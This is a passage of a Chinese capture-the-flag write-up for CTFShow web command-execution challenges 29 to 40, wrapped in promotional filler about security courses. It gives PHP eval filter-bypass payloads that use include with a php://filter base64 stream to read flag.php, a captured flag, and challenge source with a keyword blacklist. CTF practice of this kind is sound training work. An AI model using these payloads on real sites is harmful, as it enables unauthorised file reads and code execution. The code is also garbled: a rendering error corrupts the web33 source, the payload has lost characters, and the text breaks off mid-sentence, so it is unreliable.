CTFShow-WEB入门篇命令执行详细Wp(29-40)_ctfshow-web入门篇详细wp

给大家的福利

零基础入门

对于从来没有接触过网络安全的同学，我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线，大家跟着这个大的方向学习准没问题。

同时每个成长路线对应的板块都有配套的视频提供：

因篇幅有限，仅展示部分资料

网上学习资料一大堆，但如果学到的知识不成体系，遇到问题时只是浅尝辄止，不再深入研究，那么很难做到真正的技术提升。

需要这份系统化资料的朋友，可以点击这里获取

一个人可以走的很快，但一群人才能走的更远！不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！

highlight\_file(\_\_FILE\_\_);

}

**这里又过滤了反斜杠，`echo`，分号，括号 这里可以使用`include`函数可以不用括号 实现文件包含 配合伪协议 分号可以使用`>?` 代替**


**PS：我们只需要知道 过滤了参数可以使用代替进行绕过就行了这是做题的思路 还是很好理解的**

php://filter/read=convert.base64-encode/resource=flag.php #伪协议
?c=include_GET[cmd]>?&cmd=php://filter/read=convert.base64-encode/resource=flag.php

![在这里插入图片描述](https://img-blog.csdnimg.cn/f2f7f14a677b4e92bab3d44a8f7f395b.png)



> 
> `ctfshow{22eca81d-7663-4150-bc72-57825852ad03}`
> 
> 
> 


### web33：

error_reporting(0);
if(isset($_GET[‘c’])){
$c = $_GET[‘c’];
if(!preg_match(“/flag|system|php|cat|sort|shell|.| |'|`|echo|;|(|”/i", KaTeX parse error: Expected '}', got 'EOF' at end of input: …{ eval(c);
}

}else{
highlight_file(__FILE__);
}

**过